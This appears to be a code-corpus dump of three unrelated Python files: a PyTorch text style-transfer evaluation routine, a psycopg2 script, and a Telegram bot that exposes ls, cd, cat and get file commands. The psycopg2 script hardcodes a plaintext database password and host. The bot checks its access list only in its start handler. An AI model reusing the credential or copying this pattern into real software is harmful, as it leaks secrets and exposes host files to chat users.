# print(f"ep:{ep}, step: {step}, src.shape[1] is", src.shape[1])
sorted_src_len, indices = torch.sort(src_len, dim=0, descending=True)
_, resorted_indices = torch.sort(indices, dim=0)
sorted_src = torch.index_select(src, dim=0, index=indices)
sorted_lab = torch.index_select(lab, dim=0, index=indices)
sorted_src = sorted_src.to(args.device)
sorted_src_len = sorted_src_len.to(args.device)
sorted_lab = sorted_lab.to(args.device)
resorted_indices = resorted_indices.to(args.device)
try:
sorted_src_pad_mask = sorted_src==pad_id
sorted_loss_tuple, sorted_outputs_tuple,\
sorted_algin = model(sorted_src, sorted_src_len,
sorted_lab, sorted_src_pad_mask)
sorted_rec_loss, sorted_bt_loss,\
sorted_src_cls_loss, sorted_soft_out_cls_loss,\
sorted_out_cls_loss, sorted_ca_loss = sorted_loss_tuple
sorted_outputs, sorted_outputs_len = sorted_outputs_tuple
# shape of sorted_outputs is [batch_size, max_len]
outputs = torch.index_select(sorted_outputs, dim=0, index=resorted_indices)
outputs_len = torch.index_select(sorted_outputs_len, dim=0, index=resorted_indices)
clf_preds = torch.argmax(clf_model(outputs), dim=-1)
rec_loss = sorted_rec_loss.sum()
bt_loss = sorted_bt_loss.sum()
src_cls_loss = sorted_src_cls_loss.sum()
soft_out_cls_loss = sorted_soft_out_cls_loss.sum()
out_cls_loss = sorted_out_cls_loss.sum()
ca_loss = sorted_ca_loss.sum()
loss = rec_loss + bt_w * bt_loss\
+ cls_w * soft_out_cls_loss + ca_w * ca_loss
total_rec_loss += rec_loss.item()
total_bt_loss += bt_loss.item()
total_src_cls_loss += src_cls_loss.item()
total_soft_out_cls_loss += soft_out_cls_loss.item()
total_out_cls_loss += out_cls_loss.item()
total_ca_loss += ca_loss.item()
total_loss += loss.item()
outputs_list.extend(
[x.squeeze(0) for x in torch.split(outputs, split_size_or_sections=1, dim=0)]
)
outputs_len_list.extend(
[x.squeeze(0) for x in torch.split(outputs_len, split_size_or_sections=1, dim=0)]
)
lab_list.extend(
[x.squeeze(0) for x in torch.split(lab, split_size_or_sections=1, dim=0)]
)
clf_preds_list.extend(
[x.squeeze(0).item() for x in torch.split(clf_preds, split_size_or_sections=1, dim=0)]
)
except RuntimeError as e:
if 'out of memory' in str(e):
print('|| WARNING: ran out of memory ||\n')
if hasattr(torch.cuda, 'empty_cache'):
torch.cuda.empty_cache()
else:
print('|| WARNING: fail to train ||\n')
raise e
eval_loss = total_loss / num_data
eval_rec_loss = total_rec_loss / num_data
eval_bt_loss = total_bt_loss / num_data
eval_src_cls_loss = total_src_cls_loss / num_data
eval_soft_out_cls_loss = total_soft_out_cls_loss / num_data
eval_out_cls_loss = total_out_cls_loss / num_data
eval_ca_loss = total_ca_loss / num_data
inv_lab_list = 1-np.array(lab_list)
# print("clf_preds_list is")
# print(clf_preds_list)
eval_acc = accuracy_score(inv_lab_list, np.array(clf_preds_list)) * 100.0
transfer_file_names = [
os.path.join(args.output_dir, f"{data_name}.0.tsf"),
os.path.join(args.output_dir, f"{data_name}.1.tsf")
]
transfer_files = [
open(transfer_file_names[0], 'w'),
open(transfer_file_names[1], 'w')
]
count = 0
# print(f"len(outputs_list): {len(outputs_list)}, len(outputs_len_list): {len(outputs_len_list)}")
for output, output_len, l in zip(outputs_list, outputs_len_list, lab_list):
# print("output is", output)
text = tokenizer.decode(output, include_sos_eos=False)
if output_len < args.max_decoding_len:
pass
if args.use_bpe:
text = text.replace("@@ ", "")
text = text.strip("@@")
transfer_files[l].write(text+'\n')
count += 1
transfer_files[0].close()
transfer_files[1].close()
try:
assert count == num_data
except:
print(f"count: {count}, total_num: {num_data}")
raise RuntimeError()
bleu_evaluator = BLEUEvaluator()
if ref_path_list is not None:
bleu_score_021 = bleu_evaluator.score(ref_path_list[0], transfer_file_names[0])
bleu_score_120 = bleu_evaluator.score(ref_path_list[1], transfer_file_names[1])
bleu_score = (bleu_score_021 + bleu_score_120) / 2
else:
bleu_score = None
if data_path_list is not None:
self_bleu_score_021 = bleu_evaluator.score(data_path_list[0], transfer_file_names[0])
self_bleu_score_120 = bleu_evaluator.score(data_path_list[1], transfer_file_names[1])
self_bleu_score = (self_bleu_score_021 + self_bleu_score_120) / 2
else:
self_bleu_score = None
print("==============================")
if ref_path_list is not None:
print(
f"BLEU: {bleu_score:.4f} "\
f"(0->1:{bleu_score_021:.4f}, 1->0:{bleu_score_120:.4f}) ",
end='',
)
if data_path_list is not None:
print(
f"self-BLEU: {self_bleu_score:.4f} "\
f"(0->1:{self_bleu_score_021:.4f}, 1->0:{self_bleu_score_120:.4f}) ",
end='',
)
print(
f"acc: {eval_acc:.4f}\n"\
f"loss: {eval_loss:.4f} "\
f"rec_loss: {eval_rec_loss:.4f} "\
f"bt_loss: {eval_bt_loss:.4f} "\
f"src_cls_loss: {eval_src_cls_loss:.4f} "\
f"soft_out_cls_loss: {eval_soft_out_cls_loss:.4f} "\
f"out_cls_loss: {eval_out_cls_loss:.4f} "\
f"ca_loss: {eval_ca_loss:.4f} "\
f"time: {misc.timeBetween(start_time, time.time())}"
)
print("==============================\n")
return (bleu_score, self_bleu_score, eval_acc)
def test(self, test_dataloader=None, data_path_list=None, ref_path_list=None):
test_dataloader = test_dataloader if test_dataloader else self.test_dataloader
ref_path_list = ref_path_list if ref_path_list else self.test_ref_path_list
data_path_list = data_path_list if data_path_list else self.test_data_path_list
return self.evaluate(test_dataloader, data_path_list, ref_path_list, "test")
def save_train_result(self, train_record, eval_record):
args = self.args
train_loss_record = train_record
dev_metric_record, eval_gs_record = eval_record
dev_unzip = list(zip(*dev_metric_record))
dev_bleu_record, dev_self_bleu_record, dev_acc_record = np.array(dev_unzip[0]),\
np.array(dev_unzip[1]), np.array(dev_unzip[2])
if (dev_bleu_record!=None).all():
best_dev_bleu = np.max(dev_bleu_record)
step_of_best_dev_bleu = eval_gs_record[np.argmax(dev_bleu_record)]
print("best dev BLEU: %.4f in step %d" % (best_dev_bleu, step_of_best_dev_bleu))
fig = plt.figure()
ax_1 = fig.add_subplot(111)
ax_2 = ax_1.twinx()
ax_1.set_xlabel("step")
ax_1.set_ylabel("(self-)BLEU")
ax_2.set_ylabel("Acc")
line_list = []
line_label_list = []
if (dev_bleu_record!=None).all():
# l, = ax_1.plot(eval_gs_record, dev_bleu_record, '-', c='#1f77b4', label="dev BLEU")
l, = ax_1.plot(eval_gs_record, dev_bleu_record, '-', c='#1f77b4')
line_list.append(l)
line_label_list.append("dev BLEU")
# l, = ax_1.plot(eval_gs_record, dev_self_bleu_record, ':', c='#1f77b4', label="dev self-BLEU")
l, = ax_1.plot(eval_gs_record, dev_self_bleu_record, ':', c='#1f77b4')
line_list.append(l)
line_label_list.append("dev self-BLEU")
# l, = ax_2.plot(eval_gs_record, dev_acc_record, '--', c='#1f77b4', label="dev acc")
l, = ax_2.plot(eval_gs_record, dev_acc_record, '--', c='#1f77b4')
line_list.append(l)
line_label_list.append("dev acc")
plt.legend(line_list, line_label_list)
plt.tight_layout()
plt.savefig(os.path.join(args.output_dir, "bleu_and_acc.pdf"), format='pdf') # bbox_inches='tight'
plt.close()
plt.figure()
plt.xlabel("step")
plt.ylabel("loss")
plt.plot(list(range(len(train_loss_record))), train_loss_record)
# plt.plot(eval_gs_record, eval_loss_record)
plt.tight_layout()
plt.savefig(os.path.join(args.output_dir, "loss.pdf"), format='pdf')
plt.close()
| 30,022 | 9,673 |
import psycopg2
# import sqlite3
DB_NAME = "ekasuicm"
DB_USER = "ekasuicm"
DB_PASSWORD = "5xL04dTyJuqjmPNeDPWsHjZsCnMmqpbM"
DB_HOST = "ruby.db.elephantsql.com"
connection = psycopg2.connect(dbname=DB_NAME, user=DB_USER,
password=DB_PASSWORD, host=DB_HOST)
print("CONNECTION", type(connection))
cursor = connection.cursor()
print("CURSOR", type(cursor))
cursor.execute('SELECT * from titanic_data;')
result = cursor.fetchall()
for row in result:
print result
print result[0]
print result[1]
| 561 | 225 |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import logging
logging.basicConfig(level=logging.DEBUG,
format='%(asctime)s - %(name)s - %(levelname)s - %(message)s')
logger = logging.getLogger(__name__)
from telegram import Updater
from commands import history, cat, cd, get, ls, pwd, save
from settings import ACCESS_LIST, BOT_TOCKEN
from utils import on_error_decorator
@on_error_decorator
def on_ls(bot, update):
path = update.message.text[3:].strip()
user = update.message.from_user['username']
bot.sendMessage(update.message.chat_id, text='<pre>%s</pre>' % ls(user, path), parse_mode='HTML')
@on_error_decorator
def on_start(bot, update):
if update.message.from_user['username'] not in ACCESS_LIST:
bot.sendMessage(update.message.chat_id, text='<b>Я не твоя мамочка!</b>', parse_mode='HTML')
else:
bot.sendMessage(update.message.chat_id, text=pwd(user))
def on_error(_, update, error):
logger.warn('Update "%s" caused error "%s"' % (update, error))
@on_error_decorator
def on_cd(bot, update):
path = update.message.text[3:].strip()
user = update.message.from_user['username']
bot.sendMessage(update.message.chat_id, text='<pre>%s</pre>' % cd(user, path), parse_mode='HTML')
@on_error_decorator
def on_get(bot, update):
path = update.message.text[4:].strip()
user = update.message.from_user['username']
f, f_type = get(user, path)
{'video': bot.sendVideo,
'audio': bot.sendAudio,
'image': bot.sendPhoto}.get(f_type,
bot.sendDocument(update.message.chat_id,
f,
filename=path)
)(update.message.chat_id, f)
@on_error_decorator
def on_pwd(bot, update):
user = update.message.from_user['username']
bot.sendMessage(update.message.chat_id, text=pwd(user))
@on_error_decorator
def on_history(bot, update):
user = update.message.from_user['username']
bot.sendMessage(update.message.chat_id, text=history(user))
@on_error_decorator
def on_message(bot, update):
if hasattr(update.message, 'document'):
bot.sendMessage(update.message.chat_id,
text=save(update.message.from_user['username'],
bot.getFile(update.message.document.file_id),
update.message.document.file_name))
@on_error_decorator
def on_cat(bot, update):
path = update.message.text[4:].strip()
user = update.message.from_user['username']
bot.sendMessage(update.message.chat_id, text='<pre>%s</pre>' % cat(user, path), parse_mode='HTML')
def run_bot():
updater = Updater(BOT_TOCKEN)
updater.dispatcher.addErrorHandler(on_error)
updater.dispatcher.addTelegramCommandHandler("start", on_start)
updater.dispatcher.addTelegramCommandHandler("ls", on_ls)
updater.dispatcher.addTelegramCommandHandler("cd", on_cd)
updater.dispatcher.addTelegramCommandHandler("get", on_get)
updater.dispatcher.addTelegramCommandHandler("cat", on_cat)
updater.dispatcher.addTelegramCommandHandler("pwd", on_pwd)
updater.dispatcher.addTelegramCommandHandler("history", on_history)
updater.dispatcher.addTelegramMessageHandler(on_message)
updater.start_polling()
updater.idle()
if __name__ == '__main__':
run_bot()
| 3,414 | 1,136 |